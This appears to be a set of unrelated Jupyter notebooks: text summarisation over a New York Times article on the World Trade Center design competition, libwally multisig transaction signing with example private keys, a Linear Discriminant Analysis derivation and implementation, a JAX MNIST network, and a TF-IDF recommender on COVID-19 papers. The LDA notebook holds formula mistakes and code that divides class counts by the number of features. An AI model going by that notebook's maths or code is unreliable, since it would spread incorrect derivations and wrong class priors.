Garden in Lower Manhattan as the greatest architecture show ever, many have privately expressed reservations about the designs' details, the handling of the competition and even the spotlight in which the contestants now stand.\n\n ''Architecture is finally having a visible presence, perhaps too visible,'' said Ricardo Scofidio of Diller & Scofidio in Manhattan.\n\n \n\n \n\n Many architects fear that the attention and intensity given to the World Trade Center designs will greatly affect the project.\n\n \n\n \n\n While architects have publicly proclaimed the World Trade Center site proposals displayed at the Winter Garden in Lower Manhattan as the greatest architecture show ever, many have privately expressed reservations about the designs' details, the handling of the competition and even the spotlight in which the contestants now stand.\n\n ''Architecture is finally having a visible presence, perhaps too visible,'' said Ricardo Scofidio of Diller & Scofidio in Manhattan.\n\n The popular image of the architect as a creative genius whipping up great designs on a cocktail napkin is at odds with the reality. More often, architects say, great design is the result of constant, sometimes painful give-and-take between the architect and the client. Letting the public in on the process from the start, even as spectators, has pulled back the veil on a ritual that is most often conducted in the hush of boardrooms and private offices.\n\n By contrast, the Lower Manhattan Development Corporation announced that its design priorities for the site would be determined ''by conducting the most comprehensive public outreach campaign ever undertaken.'' The power of public opinion to sway the process was amply demonstrated in July when six initial site plans were universally rejected. In this, the second round, the public has been treated to front-row seats: the presentations by the seven competing architectural teams were televised live for more than three hours, and an exhibition of their models, renderings and video walk-throughs was open to the public almost immediately. Several architectural institutions have stepped in quickly to arrange their own forums, discussion groups and exhibitions on the process, and television networks have devoted unusual amounts of air time to explaining site plans and computer-animated design.\n\n Architects ''presenting on TV has never happened before,'' Mr. Scofidio added. ''But at this phase, letting the public say what it likes and doesn't like will only make the water muddier,'' he said, explaining that what may be a great spectacle was no way to select a design.\n\n Bill Lacy, a design consultant and adviser to the jury on architecture's highest honor, the Pritzker Prize, said that the Lower Manhattan redevelopment was ''far too important to be judged by public opinion poll.''\n\n ''I feel sorry for these architects designing in a fish bowl,'' he continued. ''The first team did a credible job but was crucified by being exposed to the public prematurely. People are so eager for something positive to happen, but land use and massing studies are never exciting. You can't design for seven million clients.''\n\n Mindful of the effort involved in preparing such complex and historically significant designs in just eight weeks (and with fees of only $40,000), the 16 architects interviewed for this article were loath to single out any team's design. But they did not hesitate to criticize the process as too exposed and the requirements as too vague.\n\n The attention and its intensity are mixed blessings, said some architects, who worried that some of the more implausible designs might be taken literally, leaving the entire profession open to ridicule and condemnation. ''There is something a little grotesque in the interpretation of ground zero as a lucky break for art,'' Leon Wieseltier, literary editor of The New Republic, said last September in a debate with Daniel Libeskind, one of the competing architects, at Columbia University.\n\n The development corporation has frequently said that the object of the competition, a master land-use plan, is not to ''include the detailed architecture of individual structures.'' But many architects worry that the teams' detailed models and impressively realistic video presentations will encourage the public to perceive them as concrete plans.\n\n Bernard Tschumi, a semifinalist in the competition and the dean of the Columbia Graduate School of Architecture, Planning and Preservation, described the process as backward. ''They are starting with a design and hope to arrive at a program,'' he said. ''It strikes me as unusual. And since each design is based on its own premises, you really can't compare them to each other at all. The ambiguity is not right.''\n\n While some architects championed the competition as a way to educate the public about the importance of architecture, many faulted the proposals for the way the buildings met the ground and integrated with the city.\n\n ''There should be more talk about activities, not buildings,'' said the architect Denise Scott Brown of Venturi, Scott Brown & Associates in Philadelphia. ''A great deal of money will be spent quickly on the transit system, and that will affect what else happens. All those people coming up out of the subway will surely affect the design.'' She said she wasn't sure that factor was reflected in the proposals, ''while, in fact, it should be the generator of these designs.''\n\n Other architects said too much creative vision was expended on towers and not enough on street-level elements.\n\n ''The ground plan and infrastructure are surprisingly conservative in contrast to the boldness of the architecture,'' said Ralph Lerner, a Princeton, N.J., architect and former dean of the Princeton University School of Architecture, who is now working on the design of several areas adjacent to the World Trade Center site. ''There weren't many new thoughts on how to treat ground transportation.''\n\n Many architects, however, commended the building proposals for incorporating the latest innovations in energy efficiency. ''This will be the first time that European daring in ecological issues has been introduced at such a scale in the U.S.,'' said Raymond W. Gastil, executive director of the Van Alen Institute, a nonprofit organization devoted to increasing awareness of public architecture, ''but it will create new standards for all skyscrapers.''\n\n The Van Alen Institute recently published a report, ''Information Exchange: How Cities Renew, Rebuild and Remember,'' exploring how seven cities, including Beirut, Sarajevo and Berlin, rebuilt themselves in the wake of both natural and political disasters.\n\n As for building height, architects' opinions varied about what was appropriate for structures that would stand not in, but next to, the footsteps of the lanky twin towers.\n\n ''I'm offended by everyone reaching to the sky again,'' said Will Bruder, an architect in Phoenix who focuses on environmental and recycling issues. Of the tall designs, he found Mr. Libeskind's 1,776-foot tapering tower the most convincing. ''At least he reached up to the sky with sculpture instead of a bulky mass,'' Mr. Bruder said.\n\n Did any of the competitors succeed at reinventing the skyscraper for a new era? Only if you've never seen Hong Kong, Mr. Lerner said. United Architects' tall, angled structures, which combined into a single public floor high in the sky, were the only proposals suggesting a new way of thinking about large buildings in groups, he added.\n\n Hugh Hardy of Hardy Holzmann Pfeiffer in Manhattan, who did not participate in the competition, said he was not convinced that a new kind of skyscraper was possible at this time. The circumstances that created landmarks like the Chrysler and Empire State buildings were different, he said. ''Not in our lifetime has anyone been able to figure out what New York should be,'' Mr. Hardy explained. ''We're all out of practice, and there's no powerful leadership. Without someone in charge, it's all going to have to be worked out each step of the way.''\n\n All the architects wondered how the development corporation would proceed. The interested public, already well informed on the issues, has still more opportunities to learn. On Monday the Architectural League will open an exhibition that is like a continuing public tutorial. It will display a range of documents connected to the design proposals, from the architects' video presentations to the reactions of the European news media.\n\n The exhibition is intended to be ''an archive of the process,'' said Rosalie Genevro, the league's executive director, and it will be updated as more materials become available. ''The first round was so bland, there was nothing to talk about,'' she said. ''Now there's so much more to look at and to sort out. And there's more emotion.'' The exhibition will run through the end of February, when, the development corporation announced, it will adopt a final master land-use plan and undertake a competition for a ground zero memorial.\n\n On Tuesday Architectural Record magazine is sponsoring a forum of architects and architectural critics, including Mr. Tschumi and Richard Kahan, the former chief executive of the Battery Park City Authority, who oversaw the creation of the master plan for Battery Park City in the 1980's. All the architects in the competition have been invited, along with representatives of the development corporation and Port Authority.\n\n ''It's an intellectual exercise,'' said Robert Ivy, the editor in chief of Architectural Record. ''Have there ever been so many wonderful ideas to discuss, such depth of feeling to explore? My great fear is that they are trying to make a camel with three humps.''\n\n But fears and criticism pale beside the excitement that most architects said they felt at the opportunity to see so much world-class architecture on display. ''This is a fantastic show of talent,'' said Cesar Pelli, the architect of the World Financial Center and the Winter Garden, who estimated that the architects involved must have spent as much as $4 million on their combined presentations.\n\n ''The community is getting a huge gift from these architects,'' Mr. Pelli said, adding, ''Of course, the architects are also getting phenomenal P.R.''""".replace('\n', ' ') abstract = """Architects privately note difficulties resulting from power of public opinion in choosing design for World Trade Center site; note unheard-of live TV broadcast presenting six initial site plans, which resulted in rejection of all designs; interviews reveal variety of opinions among architects on unusual selection process; photo (M)""" text = re.sub(r'[ ]+', ' ', text) print('Text:') print('-' * 80) print(text) print('-' * 80) print() print('Abstract:') print('-' * 80) print(abstract) print('-' * 80) for sentence1 in nltk.sent_tokenize(abstract): scores = [] text_sentences = nltk.sent_tokenize(text) for sentence2 in text_sentences: words1 = {clean_word(word) for word in nltk.word_tokenize(sentence1) if len(clean_word(word)) > 0} words2 = {clean_word(word) for word in nltk.word_tokenize(sentence2) if len(clean_word(word)) > 0} scores.append(compute_jaccard_index(words1, words2)) related_indices = set() if np.max(scores) > 0.: related_indices.add(np.argmax(scores)) for index, score in enumerate(scores): if score > 0.6: related_indices.add(index) print('Sentence in abstract: "%s"' % sentence1) print('-' * 80) for index in related_indices: print('Related sentence in text: "%s"' % text_sentences[index]) print('-' * 80) print() ``` It is interesting to see to what amount the text is reduced. A large reduction results in a great speed-up of the processing. ``` related_sentences = [] for sentence1 in nltk.sent_tokenize(abstract): scores = [] text_sentences = nltk.sent_tokenize(text) for sentence2 in text_sentences: words1 = {clean_word(word) for word in nltk.word_tokenize(sentence1) if len(clean_word(word)) > 0} words2 = {clean_word(word) for word in nltk.word_tokenize(sentence2) if len(clean_word(word)) > 0} scores.append(compute_jaccard_index(words1, words2)) related_indices = set() if np.max(scores) > 0.: related_indices.add(np.argmax(scores)) for index, score in enumerate(scores): if score > 0.6: related_indices.add(index) for index in related_indices: related_sentences.append(text_sentences[index]) constructed_abstract = ' '.join(related_sentences) print('Original size: %d characters' % len(text)) print('New size: %d characters' % len(constructed_abstract)) print('Compression ratio: %.2f%%' % (-100. * (len(constructed_abstract) - len(text)) / float(len(text)))) ``` A large portion of the input data is neglected when it becomes possible to select what the most important sentences of a text are. ## Conclusion If it is possible to learn which sentences to select, it is straightforward to select the salient entities. The input size is reduced significantly in this process.
github_jupyter
``` import wallycore as wally def buildTransaction(tx_inputs, tx_outputs): tx = wally.tx_init(2, 0, 1, 2) # version 2, locktime 0, 1 input, 2 outputs for tx_input in tx_inputs: wally.tx_add_input(tx, tx_input) for tx_output in tx_outputs: wally.tx_add_output(tx, tx_output) return tx def buildInput(tx_input_hex, tx_input_vout, sequence): tx_input_byte = wally.hex_to_bytes(tx_input_hex)[::-1] return wally.tx_elements_input_init(tx_input_byte, tx_input_vout, sequence, None, None, None, None, None, None, None, None, None) def buildOutput(value, asset_id, script_byte): confidential_tx_value_byte = wally.tx_confidential_value_from_satoshi(value) return wally.tx_elements_output_init(script_byte, asset_id, confidential_tx_value_byte, None, None, None) ELEMENTS_UNBLINDED_TX_PREFIX = 0x01 tx_input_hex = "53174bc15eef5b16522b5fe45cf2e147e829990dd72454ab7d2a493e220e4c36" asset_id = bytearray([ELEMENTS_UNBLINDED_TX_PREFIX]) + wally.hex_to_bytes("9e56d67dee0fbe395374572d2a389e56659380e2b58ad43081e0d3ddcab1a0f7")[::-1] script = wally.hex_to_bytes("76a9144f844a62154987b501dccfd6c504596759e9f24888ac") sequence = 0xffffffff tx_inputs = [buildInput(tx_input_hex, 0, sequence)] tx_outputs = [buildOutput(12345, asset_id, script), buildOutput(500, asset_id, None)] tx = buildTransaction(tx_inputs, tx_outputs) tx_hex = wally.tx_to_hex(tx, 0) print(tx_hex) def generateRedeemScript(private_keys, threshold): public_keys = bytearray([]) for private_key in private_keys: public_key = wally.ec_public_key_from_private_key(private_key) public_keys += public_key return wally.scriptpubkey_multisig_from_bytes(public_keys, threshold, 0) def signInputs(tx, private_keys, input_values, prev_out_scripts, sighashes): for index, (private_keys, input_value, prev_out_script, sighash) in enumerate(zip(private_keys, input_values, prev_out_scripts, sighashes)): witness_stack = wally.tx_witness_stack_init(len(private_keys) + 2) wally.tx_witness_stack_add_dummy(witness_stack, wally.WALLY_TX_DUMMY_NULL); input_value = wally.tx_confidential_value_from_satoshi(input_value); hash_to_sign = wally.tx_get_elements_signature_hash(tx, index, prev_out_script, input_value, sighash, wally.WALLY_TX_FLAG_USE_WITNESS) for private_key in private_keys: public_key = wally.ec_public_key_from_private_key(private_key) signature = wally.ec_sig_from_bytes(private_key, hash_to_sign, wally.EC_FLAG_ECDSA | wally.EC_FLAG_GRIND_R) der_signature = wally.ec_sig_to_der(signature) + bytearray([wally.WALLY_SIGHASH_ALL]) wally.tx_witness_stack_add(witness_stack, der_signature) wally.tx_witness_stack_add(witness_stack, prev_out_script) script_sig = bytearray([0x22, 0x00, 0x20]) + wally.sha256(prev_out_script) wally.tx_set_input_script(tx, index, script_sig) wally.tx_set_input_witness(tx, index, witness_stack) private_keys = [wally.hex_to_bytes("d23388f6ed69564cbd7518bde279bcffac2156aeea024fe527726d7b5250d461"), wally.hex_to_bytes("c1c4cfce079a36bd8d1d37b0342cc16f1bd3e5e29d5750601b27ba5e82cb6741"), wally.hex_to_bytes("2554c3ee6bea1073cfe6b9cd94328eb6c7ac510af67c1371f7e379563e02303c")] redeem_script = generateRedeemScript(private_keys, 2) signInputs(tx, [private_keys[:2]], [12845], [redeem_script], [wally.WALLY_SIGHASH_ALL]) tx_hex = wally.tx_to_hex(tx, wally.WALLY_TX_FLAG_USE_WITNESS) print(tx_hex) ```
github_jupyter
## Probabilistic Generative Models ### Linear Discriminant Analysis As we saw in the LR, we were able to explicitly model the conditional distribution of the target class given the input features. Another approaching for modeling this distribution is by implicitly modeling it by using Bayes' theorem. This approach is known as generative learning algorithm, in which model the conditional distribution of the input features of each class. Then the posterior (conditional distribution of the target class w.r.t input features) is estimated by Bayes' theorem. And this is illustrated by the following formula:- $$ \begin{align*} \begin{split} &p(t=C_1|x) = \frac{p(t=C_1,t)}{p(x)} = \frac{p(x|t=C_1)p(C_1)}{\sum_{i}p(x,t=C_i)},\\ &=\frac{p(x|t=C_1)p(C_1)}{\sum_{i}p(x|t=C_i)p(C_i)} \end{split} \end{align*} $$ One of the Generative models is the Gaussian Discriminant model(GDM) in which we try to fit to $p(x|t=C_i)$ a multi-variate distribution, and this is indicative that the features space should be made from continuous random variables. And the Gaussian distribution is fully described by its mean and covariance matrix. Therefore, GDM model can further divided into two models one is called linear discriminant analysis (LDA) model and the other one is quadratic discriminant analysis (QDA) model, the meaning of LDA will be explained in this jupyter notebook, while QDA will be explained in another jupyter notebook. ### Explaining the linear part in LDA As was shown above, the conditional distribution of input feature space given the target class can be explained by $p(t=C_1|x)=\frac{p(x|t=C_1)p(C_1)}{\sum_{i}p(x|t=C_i)p(C_i)}$. By inserting a natural logarithm and an exponential before each $p(x, t=C_i)$, one can easily express $p(t=C_i|x)$ as follows:- $p(t=C_k|x) = \frac{exp(ln(p(x|C_k)\ p(C_k)))}{\sum_{i}exp(ln(p(x|t=C_i)p(C_i)))} = \frac{exp(a_k)}{\sum_{i}exp(a_i)}$. Also, as was mentioned before $p(x|t=C_k)$ is assumed to be a multi-variate Gaussian that is expresses by the following formula:- $$ \begin{align*} \begin{split} p(x|t=C_k) = \frac{1}{(det(2\pi \Sigma)^{D/2}} exp(\frac{-1}{2}(x-\mu_k)^T\Sigma^{-1}(x-\mu_k)) \end{split} \end{align*} $$ Also, LDA will assume that the distribution of the features space in each class is sharing the same exact covariance matrix. The $\underline{a_k}$ vector can expresses as follows:- $$ \begin{align*} \begin{split} &a_k = ln(p(x|C_k)p(C_k)) = ln(\frac{1}{det(2\pi \Sigma)}) -\frac{1}{2}(x-\mu_k)^T\Sigma^{-1}(x-\mu_k) + ln(p(C_k)), \ where\ is\ \mu\ and\ x\ are\ vectors\\ &a_k = ln(\frac{1}{det(2\pi \Sigma)}) -\frac{1}{2}\Big( x^T\Sigma^{-1}x - x^T\Sigma^{-1}\mu_k-\mu_k^{T}\Sigma^{-1}x+\mu_k^T\Sigma^{-1}\mu_k\Big) + ln(p(C_k));\ let\ t=\Sigma^{-1}\mu_k\ ,\ \Sigma^T=\Sigma and\ utilize\ a^Tb=b^Ta\\ &a_k= ln(\frac{1}{det(2\pi \Sigma)}) -\frac{1}{2}x^T\Sigma^{-1}x + \mu_k^T\Sigma^{-1}x -\frac{1}{2}\mu_k^T\Sigma^{-1}\mu_k + ln(p(C_k)) \end{split} \end{align*} $$ And now we are equipped with the necessary tool to be able to see the linearity with respect to $\underline{x}$, this can be derives as follows:- $$ \begin{align*} \begin{split} &p(C_k|x) = \frac{exp\Big( exp(ln(\frac{1}{det(2\pi \Sigma)}) -\frac{1}{2}x^T\Sigma^{-1}x + \mu_k^T\Sigma^{-1}x -\frac{1}{2}\mu_k^T\Sigma^{-1}\mu_k + ln(p(C_k))) \Big)}{\sum_{i}\Big( exp\Big( ln(\frac{1}{det(2\pi \Sigma)}) -\frac{1}{2}x^T\Sigma^{-1}x + \mu_i^T\Sigma^{-1}x -\frac{1}{2}\mu_i^T\Sigma^{-1}\mu_i + ln(p(C_i)) \Big) \Big)};\\ & we\ take\ ln(\frac{1}{det(2\pi \Sigma)}) -\frac{1}{2}x^T\Sigma^{-1}x\ as\ a common\ term\ from\ the\ denominator\\ &and\ we\ need\ to\ utilize\ exp(a+b)=exp(a)exp(b)\\ &p(C_k|x) = \frac{exp\Big( \mu_k^T\Sigma^{-1}x -\frac{1}{2}\mu_k^T\Sigma^{-1}\mu_k + ln(p(C_k) \Big)}{\sum_{i}exp\Big( \mu_k^T\Sigma^{-1}x -\frac{1}{2}\mu_k^T\Sigma^{-1}\mu_k + ln(p(C_k) \Big)}\\ &a_k(x) =\underline{w}^T\underline{x} + w_{k0} = (\Sigma^{-1}\mu_k)^Tx +\frac{-1}{2}\mu_k^T\Sigma^{-1}\mu_k + ln(p(C_k)) \end{split} \end{align*} $$ As can be seen from the last equation, we can express $a_k$ as a linear combination of the input feature, and from here the term linear was coined. Also, this indicate that the decision boundary would be linear similar to the case of logistic regression and softmax regression. And the relationship between LDA and logistic regression will be discussed later. ### Maximum Likelihood Solution This method need to estimate three parameters and these parameters are:- $p(C_k)=\phi_k$ which is proportion of observation belonging to class k, $\mu_k$ which is mean vector of the input feature for the k-th class, and $\Sigma$ which is share covariance matrix among all classes. Because we have k-classes we need to utilize the indicator function in which $\textit{I}(c =k)$ in which is equal to 1 if c was equal to k, otherwise it would be zero. Therefore, the log-Likelihood can be expressed as follows:- $$ \begin{align*} \begin{split} &\ell(\mu_1, ... \mu_k, \Sigma, \phi_1, ... \phi_k) = log\Big( p(\underline{t}|\underline{x}, \phi^s, \mu^s, \Sigma) \Big)\\ &=log\Big( \prod_{n=1}{N}\big( \prod_{k=1}^{K}p(x|C_k;.)p(C_k) \big) \Big)\\ &=log\Big( \prod_{n=1}^{N}\big( \prod_{k=1}^{K}(\phi_k \mathcal{N}(x_n;\mu_k, \Sigma))^{\textit{I}(C_k = t_n)} \big) \Big) \end{split} \end{align*} $$ So, we need to maximize the log-likelihood with respect to $\phi^s$, $\mu^s$ and $\Sigma$ and the resulting values for those parameters that maximize the log-likelihood are:- $$ \begin{align*} \begin{split} &\pi_k = \frac{N_k}{N_1 + ... + N_K}\\ &\mu_k = \frac{1}{N_k}\sum_{n=1}^{N}\textit(C_k =k) \underline{x_n}\\ &\Sigma = \frac{N_1}{N}\sigma_1+ ... +\frac{N_K}{N}\sigma_k\\ &\Sigma_k =\frac{1}{N_1}\sum_{n \in C_k}(x_n - \mu_k)(x_n - \mu_k)^T \end{split} \end{align*} $$ ### Make prediction After learning the parameters for the LDA model, we can make prediction by utilizing the following formula:- $$ \begin{align*} p(C_k|x) = \frac{exp\Big( \mu_k^T\Sigma^{-1}x -\frac{1}{2}\mu_k^T\Sigma^{-1}\mu_k + ln(\phi_k) \Big)}{\sum_{i}exp\Big( \mu_k^T\Sigma^{-1}x -\frac{1}{2}\mu_k^T\Sigma^{-1}\mu_k + ln(\phi_k) \Big)} \end{align*} $$ In which we choose the class that achieved the highest posterior value. ### Relationship between LDA and Logistic regression We will restrict LDA to deal with a 2 class dataset in order to be compared to logistic regression. The derivation of the relationship can be seen as follows:- As can be seen from above, LDA or GDA in general is equivalent to the LR when the assumption that p(X|C) is normally distributed. And if this assumption holds LDA will be faster than LR due to simple manner of estimating its parameters. But if the assumption doesn't holds and we have small data set ("Central limit theorem), the LR would achieve better LDA. ``` %matplotlib inline import numpy as np import sklearn.preprocessing import sklearn.datasets import pandas as pd import sklearn.model_selection import numpy.random import math import sklearn.metrics #X, y = sklearn.datasets.load_iris(return_X_y=True) X, y = sklearn.datasets.load_wine(return_X_y=True) X_train, X_test, y_train, y_test = sklearn.model_selection.train_test_split(X, y, random_state=42) standard = sklearn.preprocessing.StandardScaler() X_train = standard.fit_transform(X_train) training_data = np.c_[X_train, y_train]#All of the features are continuous, so, no need to use one-hot encoder and we can directly standard normalize the features of the data set X_test = standard.transform(X_test) test_data = np.c_[X_test, y_test] print(training_data.shape) print(test_data.shape) k = 3 X_train, y_train = (training_data[:, 0:-1], training_data[:, -1]) X_test, y_test = (test_data[:, 0:-1], test_data[:, -1]) class LDA_Model(object): def __init__(self, X_train, y_train, k): self.X_train = X_train self.y_train = y_train self.Mu = [mu for mu in [np.zeros((X_train.shape[1], 1))]*k] self.Sigma = [sigma for sigma in [np.zeros((X_train.shape[1], X_train.shape[1]))]*k] self.Sigma_total = np.zeros((self.X_train.shape[1], self.X_train.shape[1])) self.phis = [phi for phi in np.zeros((k, 1))] self.m = (self.X_train).shape[0] self.n = (self.X_train).shape[1] self.K = k def fit(self): data = pd.DataFrame(np.c_[self.X_train, self.y_train]) indexs = data.columns class_observations = [] N = [] for k in range(0, self.K): class_observations.append(data[data[indexs[-1]] == k]) N.append(class_observations[k].shape[0]) for k in range(0, self.K): temp = (class_observations[k]).to_numpy() mean_temp = (np.mean(temp[:, 0:-1], axis=0)).reshape(-1, 1) assert(self.Mu[k].shape == mean_temp.shape) self.Mu[k] = mean_temp.copy() self.Sigma[k] = np.cov((temp[:, 0:-1]).T) for k in range(0, self.K): self.phis[k] = N[k]/self.n self.Sigma_total = self.Sigma_total + (N[k]/self.n) * self.Sigma[k] return self.phis, self.Mu, self.Sigma_total def predict_observation(self, x): prediction = np.zeros((1, self.K)) denominator = 0 s_inv = np.linalg.inv(self.Sigma_total) for k in range(0, self.K): t1 = np.dot(self.Mu[k].T, np.dot(s_inv, x)) t2 = (-1/2)* np.dot(self.Mu[k].T, np.dot(s_inv, self.Mu[k])) t3 = np.log(self.phis[k]) temp = np.exp( t1 + t2 + t3) #print(temp.shape) #assert(denominator.shape == temp.shape) denominator = denominator + temp #print(denominator) #print(prediction.shape) for k in range(0, self.K): t1 = np.dot(self.Mu[k].T, np.dot(s_inv, x)) t2 = (-1/2)* np.dot(self.Mu[k].T, np.dot(s_inv, self.Mu[k])) t3 = np.log(self.phis[k]) temp = np.exp(t1 + t2 + t3) #print(temp.shape) #assert(temp.shape == denominator.shape) prediction[:, k] = (np.divide(temp, denominator)) return np.argmax(prediction) def predict_dataset(self, X, y): prediction = np.zeros((X.shape[0], 1)) for i in range(0, X.shape[0]): prediction[i, 0] = self.predict_observation(X[i, :]) return prediction LDA = LDA_Model(X_train, y_train, k=3) phis, Mu, Sigma_total = LDA.fit() prediction = LDA.predict_dataset(X_train, y_train) print("Performance on the training set") print(sklearn.metrics.confusion_matrix(y_train, prediction)) #print(f"precision:{sklearn.metrics.precision_score(y_train, prediction):0.3f}, recall:{sklearn.metrics.recall_score(y_train, prediction):0.3f}") prediction = LDA.predict_dataset(X_test, y_test) print("Performance on the test set") print(sklearn.metrics.confusion_matrix(y_test, prediction)) ``` ### References * Chapter 1, chapter 2 and Chapter 4 from Bishop, C. (2006). Pattern Recognition and Machine Learning. Cambridge: Springer. * Andrew Ng, Lec 4: (https://www.youtube.com/watch?v=nLKOQfKLUks) * Andrew Ng, Lec 5: (https://www.youtube.com/watch?v=qRJ3GKMOFrE)
github_jupyter
##### Copyright 2018 Google LLC. Licensed under the Apache License, Version 2.0 (the "License"); Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. # Training a Simple Neural Network, with tensorflow/datasets Data Loading _Forked from_ `neural_network_and_data_loading.ipynb` ![JAX](https://raw.githubusercontent.com/google/jax/master/images/jax_logo_250px.png) Let's combine everything we showed in the [quickstart notebook](https://colab.research.google.com/github/google/jax/blob/master/notebooks/quickstart.ipynb) to train a simple neural network. We will first specify and train a simple MLP on MNIST using JAX for the computation. We will use `tensorflow/datasets` data loading API to load images and labels (because it's pretty great, and the world doesn't need yet another data loading library :P). Of course, you can use JAX with any API that is compatible with NumPy to make specifying the model a bit more plug-and-play. Here, just for explanatory purposes, we won't use any neural network libraries or special APIs for builidng our model. ``` import jax.numpy as jnp from jax import grad, jit, vmap from jax import random ``` ### Hyperparameters Let's get a few bookkeeping items out of the way. ``` # A helper function to randomly initialize weights and biases # for a dense neural network layer def random_layer_params(m, n, key, scale=1e-2): w_key, b_key = random.split(key) return scale * random.normal(w_key, (n, m)), scale * random.normal(b_key, (n,)) # Initialize all layers for a fully-connected neural network with sizes "sizes" def init_network_params(sizes, key): keys = random.split(key, len(sizes)) return [random_layer_params(m, n, k) for m, n, k in zip(sizes[:-1], sizes[1:], keys)] layer_sizes = [784, 512, 512, 10] param_scale = 0.1 step_size = 0.01 num_epochs = 10 batch_size = 128 n_targets = 10 params = init_network_params(layer_sizes, random.PRNGKey(0)) ``` ### Auto-batching predictions Let us first define our prediction function. Note that we're defining this for a _single_ image example. We're going to use JAX's `vmap` function to automatically handle mini-batches, with no performance penalty. ``` from jax.scipy.special import logsumexp def relu(x): return jnp.maximum(0, x) def predict(params, image): # per-example predictions activations = image for w, b in params[:-1]: outputs = jnp.dot(w, activations) + b activations = relu(outputs) final_w, final_b = params[-1] logits = jnp.dot(final_w, activations) + final_b return logits - logsumexp(logits) ``` Let's check that our prediction function only works on single images. ``` # This works on single examples random_flattened_image = random.normal(random.PRNGKey(1), (28 * 28,)) preds = predict(params, random_flattened_image) print(preds.shape) # Doesn't work with a batch random_flattened_images = random.normal(random.PRNGKey(1), (10, 28 * 28)) try: preds = predict(params, random_flattened_images) except TypeError: print('Invalid shapes!') # Let's upgrade it to handle batches using `vmap` # Make a batched version of the `predict` function batched_predict = vmap(predict, in_axes=(None, 0)) # `batched_predict` has the same call signature as `predict` batched_preds = batched_predict(params, random_flattened_images) print(batched_preds.shape) ``` At this point, we have all the ingredients we need to define our neural network and train it. We've built an auto-batched version of `predict`, which we should be able to use in a loss function. We should be able to use `grad` to take the derivative of the loss with respect to the neural network parameters. Last, we should be able to use `jit` to speed up everything. ### Utility and loss functions ``` def one_hot(x, k, dtype=jnp.float32): """Create a one-hot encoding of x of size k.""" return jnp.array(x[:, None] == jnp.arange(k), dtype) def accuracy(params, images, targets): target_class = jnp.argmax(targets, axis=1) predicted_class = jnp.argmax(batched_predict(params, images), axis=1) return jnp.mean(predicted_class == target_class) def loss(params, images, targets): preds = batched_predict(params, images) return -jnp.mean(preds * targets) @jit def update(params, x, y): grads = grad(loss)(params, x, y) return [(w - step_size * dw, b - step_size * db) for (w, b), (dw, db) in zip(params, grads)] ``` ### Data Loading with `tensorflow/datasets` JAX is laser-focused on program transformations and accelerator-backed NumPy, so we don't include data loading or munging in the JAX library. There are already a lot of great data loaders out there, so let's just use them instead of reinventing anything. We'll use the `tensorflow/datasets` data loader. ``` import tensorflow_datasets as tfds data_dir = '/tmp/tfds' # Fetch full datasets for evaluation # tfds.load returns tf.Tensors (or tf.data.Datasets if batch_size != -1) # You can convert them to NumPy arrays (or iterables of NumPy arrays) with tfds.dataset_as_numpy mnist_data, info = tfds.load(name="mnist", batch_size=-1, data_dir=data_dir, with_info=True) mnist_data = tfds.as_numpy(mnist_data) train_data, test_data = mnist_data['train'], mnist_data['test'] num_labels = info.features['label'].num_classes h, w, c = info.features['image'].shape num_pixels = h * w * c # Full train set train_images, train_labels = train_data['image'], train_data['label'] train_images = jnp.reshape(train_images, (len(train_images), num_pixels)) train_labels = one_hot(train_labels, num_labels) # Full test set test_images, test_labels = test_data['image'], test_data['label'] test_images = jnp.reshape(test_images, (len(test_images), num_pixels)) test_labels = one_hot(test_labels, num_labels) print('Train:', train_images.shape, train_labels.shape) print('Test:', test_images.shape, test_labels.shape) ``` ### Training Loop ``` import time def get_train_batches(): # as_supervised=True gives us the (image, label) as a tuple instead of a dict ds = tfds.load(name='mnist', split='train', as_supervised=True, data_dir=data_dir) # You can build up an arbitrary tf.data input pipeline ds = ds.batch(batch_size).prefetch(1) # tfds.dataset_as_numpy converts the tf.data.Dataset into an iterable of NumPy arrays return tfds.as_numpy(ds) for epoch in range(num_epochs): start_time = time.time() for x, y in get_train_batches(): x = jnp.reshape(x, (len(x), num_pixels)) y = one_hot(y, num_labels) params = update(params, x, y) epoch_time = time.time() - start_time train_acc = accuracy(params, train_images, train_labels) test_acc = accuracy(params, test_images, test_labels) print("Epoch {} in {:0.2f} sec".format(epoch, epoch_time)) print("Training set accuracy {}".format(train_acc)) print("Test set accuracy {}".format(test_acc)) ``` We've now used the whole of the JAX API: `grad` for derivatives, `jit` for speedups and `vmap` for auto-vectorization. We used NumPy to specify all of our computation, and borrowed the great data loaders from `tensorflow/datasets`, and ran the whole thing on the GPU.
github_jupyter
<i>Copyright (c) Microsoft Corporation. All rights reserved.</i> <i>Licensed under the MIT License.</i> # TF-IDF Content-Based Recommendation on the COVID-19 Open Research Dataset This demonstrates a simple implementation of Term Frequency Inverse Document Frequency (TF-IDF) content-based recommendation on the [COVID-19 Open Research Dataset](https://azure.microsoft.com/en-us/services/open-datasets/catalog/covid-19-open-research/), hosted through Azure Open Datasets. In this notebook, we will create a recommender which will return the top k recommended articles similar to any article of interest (query item) in the COVID-19 Open Reserach Dataset. ``` # Set the environment path to find Recommenders import sys sys.path.append("../../") # Import functions from reco_utils.dataset import covid_utils from reco_utils.recommender.tfidf.tfidf_utils import TfidfRecommender # Print version print("System version: {}".format(sys.version)) ``` ### 1. Load the dataset into a dataframe Let's begin by loading the metadata file for the dataset into a Pandas dataframe. This file contains metadata about each of the scientific articles included in the full dataset. ``` # Specify container and metadata filename container_name = 'covid19temp' metadata_filename = 'metadata.csv' sas_token = '' # please see Azure Open Datasets notebook for SAS token # Get metadata (may take around 1-2 min) metadata = covid_utils.load_pandas_df(container_name=container_name, metadata_filename=metadata_filename, azure_storage_sas_token=sas_token) ``` ### 2. Extract articles in the public domain The dataset contains articles using a variety of licenses. We will only be using articles that fall under the public domain ([cc0](https://creativecommons.org/publicdomain/zero/1.0/)). ``` # View distribution of license types in the dataset metadata['license'].value_counts().plot(kind='bar', title='License') # Extract metadata on public domain articles only metadata_public = metadata.loc[metadata['license']=='cc0'] # Clean dataframe metadata_public = covid_utils.clean_dataframe(metadata_public) ``` Let's look at the top few rows of this dataframe which contains metadata on public domain articles. ``` # Preview metadata for public domain articles print('Number of articles in dataset: ' + str(len(metadata))) print('Number of articles in dataset that fall under the public domain (cc0): ' + str(len(metadata_public))) metadata_public.head() ``` 